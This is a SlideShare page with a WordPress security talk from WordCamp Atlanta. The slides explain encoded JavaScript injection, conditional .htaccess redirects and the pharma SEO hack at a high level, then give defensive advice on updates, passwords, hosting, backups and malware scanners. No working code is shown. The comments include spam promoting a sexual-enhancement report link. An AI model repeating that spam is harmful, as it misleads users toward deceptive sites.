Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Why My Website Sells Viagra

29.438 visualizaciones

Publicado el

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

Publicado en: Tecnología
  • ★★ How Long Does She Want You to Last? ★★ A recent study proved that the average man lasts just 2-5 minutes in bed (during intercourse). The study also showed that many women need at least 7-10 minutes of intercourse to reach "The Big O" - and, worse still... 30% of women never get there during intercourse. Clearly, most men are NOT fulfilling there women's needs in bed. Now, as I've said many times - how long you can last is no guarantee of being a GREAT LOVER. But, not being able to last 20, 30 minutes or more, is definitely a sign that you're not going to "set your woman's world on fire" between the sheets. Question is: "What can you do to last longer?" Well, one of the best recommendations I can give you today is to read THIS report. In it, you'll discover a detailed guide to an Ancient Taoist Thrusting Technique that can help any man to last much longer in bed. I can vouch 100% for the technique because my husband has been using it for years :) Here's the link to the report ♣♣♣ http://ishbv.com/rockhardx/pdf
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • ➤➤ How Long Does She Want You to Last? Here's the link to the FREE report ★★★ http://ishbv.com/rockhardx/pdf
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • Very good! Congratulations!
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • hola
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí
  • This is good. Raising the bar from a programmer pov. I like it.
       Responder 
    ¿Estás seguro?    No
    Tu mensaje aparecerá aquí

Why My Website Sells Viagra

  1. 2. DRE ARMEDA,CISSP @ DREMEDA <ul><li>CO-FOUNDER AT SUCURI SECURITY </li></ul><ul><li>ORGANIZER, WORDCAMP SAN DIEGO </li></ul><ul><li>12 YEAR NAVY VETERAN </li></ul><ul><li>1 ST WORDPRESS THEME IN 2005 </li></ul><ul><li>LOVES TACOS </li></ul><ul><li>DIEHARD CHARGERS FAN </li></ul><ul><li>RIDES A HARLEY </li></ul>SUCURI .NET DRE .IM
  2. 3.
  3. 4. THE WEB IS GROWING <ul><li>Over 2 Billion internet users today. 480% growth in the last 11 years. (Internet World Stats) </li></ul><ul><li>300 million websites were added to the internet in 2011 (Pingdom) </li></ul><ul><li>100,000+ domains gained weekly (Global Domain Registry) </li></ul>
  4. 5. INNOVATION & CREATIVITY
  5. 6.
  6. 7.
  7. 8.
  8. 9.
  9. 10. ITS NOT ALL PEACHY
  10. 11.
  11. 12. WHAT IS MALWARE? <ul><li>SEO spam, JavaScript & iFrame attacks, and malicious redirects are a couple web-based malware examples. </li></ul>Malware, short for malicious software, is a software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.
  12. 14. ATTACKERS LOVE YOU <ul><li>Monitor your web browsing and internet usage </li></ul><ul><li>Forced advertising </li></ul><ul><li>Redirect affiliate marketing revenue </li></ul>
  13. 15. HOW BAD IS IT? <ul><li>Over 2 million new malware strings monthly (McAfee) </li></ul><ul><li>Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports) </li></ul><ul><li>Google Safe Browsing issues over 3 million malware warnings a day. (Google) </li></ul>
  14. 16.
  15. 17. ENCODED JAVASCRIPT Impact: Website pages may be used to serve malicious downloads to visitors. Downloads may be used to infect desktop computers, and/or exploit FTP info. Typical Entry Point: Outdated, known vulnerable software; exploited desktop computers; exploited FTP credentials. JavaScript that is obfuscated(hidden) so that you can’t tell what it is. It is injected into files/pages on the site and used to serve malware.
  16. 18. ENCODED JAVASCRIPT /wp-admin/js/cat.js – CLEAN
  17. 19. ENCODED JAVASCRIPT /wp-admin/js/cat.js – INFECTED
  18. 20. ENCODED JAVASCRIPT /wp-admin/js/cat.js – INFECTION DECODED – Somewhat 
  19. 21. ENCODED JAVASCRIPT <ul><li>Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes). Attack stems from exploited desktop which steals FTP information. </li></ul><ul><li>Backdoor file inserted into the environment. This gives the attacker remote access into your world </li></ul><ul><li>Payload inserted into various Javascript files and/or encoded and hidden in theme, plugin files. </li></ul><ul><li>You’ve just enabled your visitors to load fake anti-virus and other cool downloads from your site  </li></ul>How it works:
  20. 22. ENCODED JAVASCRIPT <ul><li>Encoded JavaScript Resources: </li></ul><ul><li>http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation- analysis </li></ul><ul><li>http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious- javascript </li></ul><ul><li>http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript- Obfuscation.html </li></ul>QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
  21. 23. CONDITIONAL REDIRECTS Impact: When traffic is coming from a specific referrer (i.e. Google, Bing), the site is redirected to a malicious website. Typical Entry Point: Outdated, known vulnerable software. An attack the causes a website to redirect to a malicious website based on referrer, web browser, operating system.
  22. 24. CONDITIONAL REDIRECTS Infected .htaccess file:
  23. 25. CONDITIONAL REDIRECTS Result of conditional redirect:
  24. 26. CONDITIONAL REDIRECTS <ul><li>Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes). </li></ul><ul><li>Backdoor file inserted into the environment. This gives the attacker remote access into your world </li></ul><ul><li>.htaccess file entries are created to load redirected. Encoded redirect code can also be added to index files. </li></ul><ul><li>You’re now redirecting to some cool malware awesomeness. </li></ul>How it works:
  25. 27. CONDITIONAL REDIRECTS <ul><li>Conditional Redirects Resources: </li></ul><ul><li>http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in- domains.html </li></ul><ul><li>http ://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess- malware.html </li></ul><ul><li>http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html </li></ul>
  26. 28. PHARMA HACK Impact: Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages. Typical Entry Point: Outdated, known vulnerable software. Pharma Hack is a type of SEO poisoning. Attackers manipulate their search engine results to make their links appear higher than legitimate results.
  27. 29. PHARMA HACK Results of scanning rendered source.:
  28. 30. PHARMA HACK Google Search Engine Results:
  29. 31. PHARMA HACK <ul><li>Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes) </li></ul><ul><li>Backdoor file inserted into the environment. This gives the attacker remote access into your world </li></ul><ul><li>Control file is inserted into core application or plugin files. This file acts as a connection from the backdoor to the database. </li></ul><ul><li>Payload is dropped into the database and Viva Viagra! </li></ul>How it works: QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
  30. 32. PHARMA HACK <ul><li>Pharma Hack Resources: </li></ul><ul><li>http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on- wordpress.html </li></ul><ul><li>http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma- hack.html </li></ul><ul><li>http://www.pearsonified.com/2010/04/wordpress-pharma- hack.php </li></ul><ul><li>http://wpdude.com/refreshing-google-index-after-pharma- hack </li></ul>QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
  31. 33.
  32. 34. WHAT IS SECURITY? PROTECTING THINGS OF VALUE FROM HARM’S WAY.
  33. 35. HOW & WHY
  34. 36. AM I SECURE The percentage of risk can never be 0! The name of the game is minimizing risk.
  35. 38. LOCAL MACHINE <ul><li>Ensure your local machine stays updated </li></ul><ul><li>Use an Anti-Virus solution & enable auto-updates </li></ul><ul><ul><li>Mac – Sophos Anti-Virus for Mac Home Edition </li></ul></ul><ul><ul><li>Windows - AVG Anti-Virus Free </li></ul></ul><ul><li>Don’t store server credentials on your local machine </li></ul>
  36. 39. CONNECT TO YOUR SITE <ul><li>Consider using sFTP or SSH instead of FTP. </li></ul><ul><li>If you’re stuck with FTP: </li></ul><ul><ul><ul><li>Deny anonymous login </li></ul></ul></ul><ul><ul><ul><li>Limit connections </li></ul></ul></ul><ul><li>Practice least privilege </li></ul><ul><li>Don’t store server credentials on your local machine </li></ul>
  37. 40. PASSWORDS <ul><li>Change them often </li></ul><ul><li>Don’t write them down, or share them </li></ul><ul><li>Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others. </li></ul><ul><li>Don’t use the same password across all your accounts </li></ul><ul><li>Use a password manager </li></ul><ul><ul><ul><li>KeePass Password Safe </li></ul></ul></ul><ul><ul><ul><li>LastPass </li></ul></ul></ul><ul><ul><ul><li>1Password </li></ul></ul></ul>
  38. 41. WHO HOSTS YOU? <ul><li>CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST! </li></ul><ul><li>DO YOUR RESEACH! </li></ul><ul><li>What software are they running? How often do they update? </li></ul><ul><li>How are server and support credentials stored & who has access? Are they 1 in the same? </li></ul><ul><li>What is their malware remediation process? </li></ul><ul><li>How many sites have been infected? </li></ul><ul><li>http://www.google.com/safebrowsing/diagnostic?site=google.com </li></ul>
  39. 42. GARAGE CLEANING <ul><li>IF YOU’RE NOT USING IT, REMOVE IT! </li></ul><ul><li>UPDATE UPDATE UPDATE UPDATE UPDATE </li></ul><ul><li>Only load what’s needed to get your job done. </li></ul><ul><li>Check your file and directory permissions. </li></ul><ul><li>Remove user accounts! – Practice least privilege. </li></ul><ul><li>Have you changed your password lately? </li></ul><ul><li>UPDATE UPDATE UPDATE UPDATE UPDATE </li></ul>
  40. 43.
  41. 44. BACKUP YOUR WEBSITE <ul><li>NO BACKUPS = BOOOOO! </li></ul><ul><li>BackupBuddy - http:// pluginbuddy.com/ backupbuddy / </li></ul><ul><li>VaultPress – http://vaultpress.com </li></ul>
  42. 45. MALWARE SCAN <ul><li>IS YOUR SITE INFECTED? </li></ul><ul><li>Unmask Parasites – http://unmaskparasites.com </li></ul><ul><li>Sucuri SiteCheck – http://sitecheck.sucuri.net </li></ul>
  43. 46. MALWARE CLEAN UP <ul><li>IS YOUR SITE INFECTED? </li></ul><ul><li>VaultPress – http://vaultpress.com </li></ul><ul><li>Sucuri Security – http://sucuri.net </li></ul>
  44. 47. WORDPRESS PLUGINS <ul><li>WordPress Exploit Scanner </li></ul><ul><li>BulletProof Security </li></ul><ul><li>Login Lockdown </li></ul><ul><li>Sucuri SiteCheck Malware Scanner </li></ul>

×